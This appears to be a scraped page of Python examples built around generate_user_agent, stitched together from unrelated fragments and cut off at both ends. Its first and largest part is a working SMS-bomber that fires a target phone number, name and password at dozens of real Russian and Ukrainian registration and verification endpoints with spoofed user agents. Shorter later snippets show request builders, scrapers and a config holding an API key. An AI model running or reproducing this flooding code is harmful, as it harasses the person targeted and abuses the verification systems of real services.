            post(
                "https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php",
                data={
                    "name": name,
                    "phone": phone
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.monobank.com.ua/api/mobapplink/send",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://moneyman.ru/registration_api/actions/send-confirmation-code",
                data="+" + phone,
                headers=headers)
        except:
            pass
        try:
            post("https://my.modulbank.ru/api/v2/registration/nameAndPhone",
                 json={
                     "FirstName": name,
                     "CellPhone": phone,
                     "Package": "optimal"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://mobileplanet.ua/register",
                 data={
                     "klient_name": name,
                     "klient_phone": "+" + phone,
                     "klient_email": email
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://my.mistercash.ua/ru/send/sms/registration",
                params={"number": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            get("https://menza-cafe.ru/system/call_me.php",
                params={
                    "fio": name,
                    "phone": phone,
                    "phone_number": "1"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://www.menu.ua/kiev/delivery/registration/direct-registration.html",
                data={
                    "user_info[fullname]": name,
                    "user_info[phone]": phone,
                    "user_info[email]": email,
                    "user_info[password]": password,
                    "user_info[conf_password]": password
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.menu.ua/kiev/delivery/profile/show-verify.html",
                 data={
                     "phone": phone,
                     "do": "phone"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# ### ### ## ##")
            get("https://makimaki.ru/system/callback.php",
                params={
                    "cb_fio": name,
                    "cb_phone": formatted_phone
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php",
                data={
                    "data": phone,
                    "metod": "postreg"
                },
                headers=headers)
        except:
            pass
        try:
            post(
                "https://api-rest.logistictech.ru/api/v1.1/clients/request-code",
                json={"phone": phone},
                headers={
                    "Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9",
                    "User-Agent": generate_user_agent()
                })
        except:
            pass
        try:
            post("https://loany.com.ua/funct/ajax/registration/code",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://lenta.com/api/v1/authentication/requestValidationCode",
                json={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://koronapay.com/transfers/online/api/users/otps",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.kinoland.com.ua/api/v1/service/send-sms",
                 headers={
                     "Agent": "website",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "Phone": phone,
                     "Type": 1
                 })
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "# (###) ###-##-##")
            post("https://kilovkusa.ru/ajax.php",
                 params={
                     "block": "auth",
                     "action": "send_register_sms_code",
                     "data_type": "json"
                 },
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",
                json={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://kaspi.kz/util/send-app-link",
                 data={"address": phone9},
                 headers=headers)
        except:
            pass
        try:
            post("https://app.karusel.ru/api/v1/phone/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://izi.ua/api/auth/register",
                 json={
                     "phone": "+" + phone,
                     "name": name,
                     "is_terms_accepted": True
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://izi.ua/api/auth/sms-login",
                 json={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.ivi.ru/mobileapi/user/register/phone/v6",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+## (###) ###-##-##")
            post("https://iqlab.com.ua/session/ajaxregister",
                 data={"cellphone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2",
                 headers={
                     "Referer":
                     "https://www.ingos.ru/cabinet/registration/personal",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "Birthday": "1986-07-10T07:19:56.276+02:00",
                     "DocIssueDate": "2004-02-05T07:19:56.276+02:00",
                     "DocNumber": randint(500000, 999999),
                     "DocSeries": randint(5000, 9999),
                     "FirstName": name,
                     "Gender": "M",
                     "LastName": name,
                     "SecondName": name,
                     "Phone": phone9,
                     "Email": email
                 })
        except:
            pass
        try:
            post("https://terra-1.indriverapp.com/api/authorization?locale=ru",
                 data={
                     "mode": "request",
                     "phone": "+" + phone,
                     "phone_permission": "unknown",
                     "stream_id": 0,
                     "v": 3,
                     "appversion": "3.20.6",
                     "osversion": "unknown",
                     "devicemodel": "unknown"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://api.imgur.com/account/v1/phones/verify",
                 json={
                     "phone_number": phone,
                     "region_code": "RU"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.icq.com/smsreg/requestPhoneValidation.php",
                 data={
                     "msisdn": phone,
                     "locale": "en",
                     "countryCode": "ru",
                     "version": "1",
                     "k": "ic1rtwz1s1Hj1O0r",
                     "r": "46763"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://api.hmara.tv/stable/entrance",
                params={"contact": phone},
                headers=headers)
        except:
            pass
        try:
            post("https://helsi.me/api/healthy/accounts/login",
                 json={
                     "phone": phone,
                     "platform": "PISWeb"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.hatimaki.ru/register/",
                 data={
                     "REGISTER[LOGIN]": phone,
                     "REGISTER[PERSONAL_PHONE]": phone,
                     "REGISTER[SMS_CODE]": "",
                     "resend-sms": "1",
                     "REGISTER[EMAIL]": "",
                     "register_submit_button": "Зарегистрироваться"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://guru.taxi/api/v1/driver/session/verify",
                 json={"phone": {
                     "code": 1,
                     "number": phone9
                 }},
                 headers=headers)
        except:
            pass
        try:
            post("https://crm.getmancar.com.ua/api/veryfyaccount",
                 json={
                     "phone": "+" + phone,
                     "grant_type": "password",
                     "client_id": "gcarAppMob",
                     "client_secret": "SomeRandomCharsAndNumbersMobile"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://foodband.ru/api?call=calls",
                 data={
                     "customerName": name,
                     "phone": formatted_phone,
                     "g-recaptcha-response": ""
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://foodband.ru/api/",
                params={
                    "call": "customers/sendVerificationCode",
                    "phone": phone9,
                    "g-recaptcha-response": ""
                },
                headers=headers)
        except:
            pass
        try:
            post("https://www.flipkart.com/api/5/user/otp/generate",
                 headers={
                     "Origin": "https://www.flipkart.com",
                     "User-Agent": generate_user_agent()
                 },
                 data={"loginId": "+" + phone})
        except:
            pass
        try:
            post("https://www.flipkart.com/api/6/user/signup/status",
                 headers={
                     "Origin": "https://www.flipkart.com",
                     "User-Agent": generate_user_agent()
                 },
                 json={
                     "loginId": "+" + phone,
                     "supportAllStates": True
                 })
        except:
            pass
        try:
            post("https://fix-price.ru/ajax/register_phone_code.php",
                 data={
                     "register_call": "Y",
                     "action": "getCode",
                     "phone": "+" + phone
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://findclone.ru/register",
                params={"phone": "+" + phone},
                headers=headers)
        except:
            pass
        try:
            post("https://www.finam.ru/api/smslocker/sendcode",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://2407.smartomato.ru/account/session",
                 json={
                     "phone": formatted_phone,
                     "g-recaptcha-response": None
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://www.etm.ru/cat/runprog.html",
                 data={
                     "m_phone": phone9,
                     "mode": "sendSms",
                     "syf_prog": "clients-services",
                     "getSysParam": "yes"
                 },
                 headers=headers)
        except:
            pass
        try:
            get("https://api.eldorado.ua/v1/sign/",
                params={
                    "login": phone,
                    "step": "phone-check",
                    "fb_id": "null",
                    "fb_token": "null",
                    "lang": "ru"
                },
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+## (###) ###-##-##")
            post("https://e-groshi.com/online/reg",
                 data={
                     "first_name": name,
                     "last_name": name,
                     "third_name": name,
                     "phone": formatted_phone,
                     "password": password,
                     "password2": password
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://vladimir.edostav.ru/site/CheckAuthLogin",
                 data={"phone_or_email": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.easypay.ua/api/auth/register",
                 json={
                     "phone": phone,
                     "password": password
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://my.dianet.com.ua/send_sms/",
                 data={"phone": phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.delitime.ru/api/v2/signup",
                 data={
                     "SignupForm[username]": phone,
                     "SignupForm[device_type]": 3
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://api.creditter.ru/confirm/sms/send",
                 json={
                     "phone": formatted_phone,
                     "type": "register"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://clients.cleversite.ru/callback/run.php",
                 data={
                     "siteid": "62731",
                     "num": phone,
                     "title": "Онлайн-консультант",
                     "referrer": "https://m.cleversite.ru/call"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://city24.ua/personalaccount/account/registration",
                 data={"PhoneNumber": phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                f"https://www.citilink.ru/registration/confirm/phone/+{phone}/",
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://cinema5.ru/api/phone_code",
                 data={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://api.cian.ru/sms/v1/send-validation-code/",
                 json={
                     "phone": "+" + phone,
                     "type": "authenticateCode"
                 },
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://api.carsmile.com/",
                son={
                    "operationName":
                    "enterPhone",
                    "variables": {
                        "phone": phone
                    },
                    "query":
                    "mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n"
                },
                headers=headers)
        except:
            pass
        try:
            get("https://it.buzzolls.ru:9995/api/v2/auth/register",
                params={"phoneNumber": "+" + phone},
                headers={
                    "keywordapi": "ProjectVApiKeyword",
                    "usedapiversion": "3",
                    "User-Agent": generate_user_agent()
                })
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "(###)###-##-##")
            post("https://bluefin.moscow/auth/register/",
                 data={
                     "phone": formatted_phone,
                     "sendphone": "Далее"
                 },
                 headers=headers)
        except:
            pass
        try:
            post("https://app.benzuber.ru/login",
                 data={"phone": "+" + phone},
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://bartokyo.ru/ajax/login.php",
                 data={"user_phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post("https://bamper.by/registration/?step=1",
                 data={
                     "phone": "+" + phone,
                     "submit": "Запросить смс подтверждения",
                     "rules": "on"
                 },
                 headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone9, "(###) ###-##-##")
            get("https://avtobzvon.ru/request/makeTestCall",
                params={"to": formatted_phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://oauth.av.ru/check-phone",
                 json={"phone": formatted_phone},
                 headers=headers)
        except:
            pass
        try:
            post(
                "https://api-prime.anytime.global/api/v2/auth/sendVerificationCode",
                data={"phone": phone},
                headers=headers)
        except:
            pass
        try:
            formatted_phone = format_phone(phone, "+# (###) ###-##-##")
            post("https://apteka.ru/_action/auth/getForm/",
                 data={
                     "form[NAME]": "",
                     "form[PERSONAL_GENDER]": "",
                     "form[PERSONAL_BIRTHDAY]": "",
                     "form[EMAIL]": "",
                     "form[LOGIN]": formatted_phone,
                     "form[PASSWORD]": password,
                     "get-new-password": "******",
                     "user_agreement": "on",
                     "personal_data_agreement": "on",
                     "formType": "simple",
                     "utc_offset": "120"
                 },
                 headers=headers)
        except:
            pass
Beispiel #53
0
 def __init__(self):
     super(HttpHandler, self).__init__()
     self.session = Session()
     self.headers = {'User-Agent': generate_user_agent()}
Beispiel #54
0
 def _getContentFromSite(self, link):
     r = requests.get(link)
     r.headers = {"User-agent:", generate_user_agent()}
     content = str(r.content, self.encoding, errors="replace")
     soup = BeautifulSoup(content, 'html.parser')
     return soup
Beispiel #55
0
for url in urllist:
	try:
		# searchinput=browser.find_element_by_css_selector('#kw')
		# searchinput.send_keys(msgstring)
		# searchinput.send_keys(Keys.DOWN)

		# 浏览器设置

		# cityname=''
		# ip_proxy=changeip(cityname)

		service_args = []
		dcap={}
		#从USER_AGENTS列表中随机选一个浏览器头,伪装浏览器
		uainfo=generate_user_agent()
		print(type(uainfo))
		print(uainfo)

		# dcap["phantomjs.page.settings.userAgent"] = (
		#   uainfo
		# )
		# dcap["phantomjs.page.settings.loadImages"] = False

		# # IP代理
		# proxy = webdriver.Proxy()  
		# proxy.proxy_type = ProxyType.MANUAL  
		# proxy.http_proxy = ip_proxy
		# proxy.add_to_capabilities(dcap)  

		# browser = webdriver.PhantomJS(desired_capabilities=dcap,service_args=service_args)
Beispiel #56
0
 def default_header(self):
     return {
         'Referer': 'https://www.chinawealth.com.cn/zzlc/jsp/lccp.jsp',
         'User-Agent': generate_user_agent(os=('mac', )),
         'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
     }
Beispiel #57
0
    'ClientId': '55decdcf6d4cd1bcaa1b3856',
    'Accept': 'application/json',
    'device': 'android',
    'Android-Api-Version': '22',
    'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536',
    'User-Agent': 'Android client (4.4 / api22),ru.kinopoisk/4.2.1 (52)'
}

config['kinopoisk']['main'][
    'search'] = 'https://kinopoiskapiunofficial.tech/api/v2.1/films/search-by-keyword?keyword=%s&page=%s'
config['kinopoisk']['main']['headers'] = lambda: {
    'Referer': 'https://www.kinopoisk.ru',
    'Accept': 'text/html, application/xhtml+xml, image/jxr, */*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.8,ru;q=0.7,uk;q=0.5,de-DE;q=0.3,de;q=0.2',
    'User-agent': generate_user_agent(),
    'X-Compress': 'null',
    'X-API-KEY': '93fbd7a8-47d8-4c0d-a822-8615816c9536',
    'Upgrade-Insecure-Requests': '1'
}

config['kinopoisk']['main'][
    'yasearch'] = 'https://suggest-kinopoisk.yandex.net/suggest-kinopoisk?srv=kinopoisk&part=%s&nocookiesupport=yes'

config['kinopoisk']['images'] = '%s'
config['kinopoisk']['imagesactor'] = 'https://st.kp.yandex.net/images/%s'
config['kinopoisk'][
    'actor'] = config.kinopoisk.imagesactor % 'actor_iphone/iphone360_%s.jpg'
config['kinopoisk'][
    'thumb'] = 'https://kinopoiskapiunofficial.tech/images/posters/kp_small/%s.jpg'
config['kinopoisk'][
Beispiel #58
0
def get_useragent():
    headers = dict()
    user_agent = generate_user_agent(os=('mac', 'linux'))
    headers['User-Agent'] = user_agent

    return (headers)
Beispiel #59
0
    def process_config(self, grab):
        req = Request(data=None)

        try:
            request_url = normalize_url(grab.config['url'])
        except Exception as ex:
            raise error.GrabInvalidUrl(
                u'%s: %s' % (six.text_type(ex), grab.config['url']))
        req.url = request_url

        method = grab.detect_request_method()
        req.method = make_str(method)

        req.body_maxsize = grab.config['body_maxsize']
        if grab.config['nobody']:
            req.body_maxsize = 0

        req.timeout = grab.config['timeout']
        req.connect_timeout = grab.config['connect_timeout']

        extra_headers = {}

        # Body processing
        if grab.config['body_inmemory']:
            pass
        else:
            if not grab.config['body_storage_dir']:
                raise GrabMisuseError(
                    'Option body_storage_dir is not defined')
            file_, path_ = self.setup_body_file(
                grab.config['body_storage_dir'],
                grab.config['body_storage_filename'],
                create_dir=grab.config['body_storage_create_dir'])
            req._response_file = file_
            req._response_path = path_

        if grab.config['multipart_post'] is not None:
            post_data = grab.config['multipart_post']
            if isinstance(post_data, six.binary_type):
                pass
            elif isinstance(post_data, six.text_type):
                raise GrabMisuseError('Option multipart_post data'
                                      ' does not accept unicode.')
            else:
                post_items = normalize_http_values(
                    grab.config['multipart_post'],
                    charset=grab.config['charset'],
                    ignore_classes=(UploadFile, UploadContent),
                )
                #if six.PY3:
                post_items = decode_pairs(post_items,
                                          grab.config['charset'])
                post_items = process_upload_items(post_items)
                post_data, content_type = encode_multipart_formdata(post_items)
                extra_headers['Content-Type'] = content_type
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data
        elif grab.config['post'] is not None:
            post_data = normalize_post_data(grab.config['post'],
                                            grab.config['charset'])
            # py3 hack
            # if six.PY3:
            #    post_data = smart_unicode(post_data,
            #                              grab.config['charset'])
            extra_headers['Content-Length'] = len(post_data)
            req.data = post_data

        if method in ('POST', 'PUT'):
            if (grab.config['post'] is None and
                grab.config['multipart_post'] is None):
                    raise GrabMisuseError('Neither `post` or `multipart_post`'
                                          ' options was specified for the %s'
                                          ' request' % method)
        # Proxy
        if grab.config['proxy']:
            req.proxy = grab.config['proxy']

        if grab.config['proxy_userpwd']:
            req.proxy_userpwd = grab.config['proxy_userpwd']

        if grab.config['proxy_type']:
            req.proxy_type = grab.config['proxy_type']
        else:
            req.proxy_type = 'http'

        # User-Agent
        if grab.config['user_agent'] is None:
            if grab.config['user_agent_file'] is not None:
                with open(grab.config['user_agent_file']) as inf:
                    lines = inf.read().splitlines()
                grab.config['user_agent'] = random.choice(lines)
            else:
                grab.config['user_agent'] = generate_user_agent()

        extra_headers['User-Agent'] = grab.config['user_agent'] 


        # Headers
        headers = extra_headers
        headers.update(grab.config['common_headers'])

        if grab.config['headers']:
            headers.update(grab.config['headers'])
        req.headers = headers

        # Cookies
        self.process_cookie_options(grab, req)


        self._request = req
Beispiel #60
0
def run():
	ua = generate_user_agent()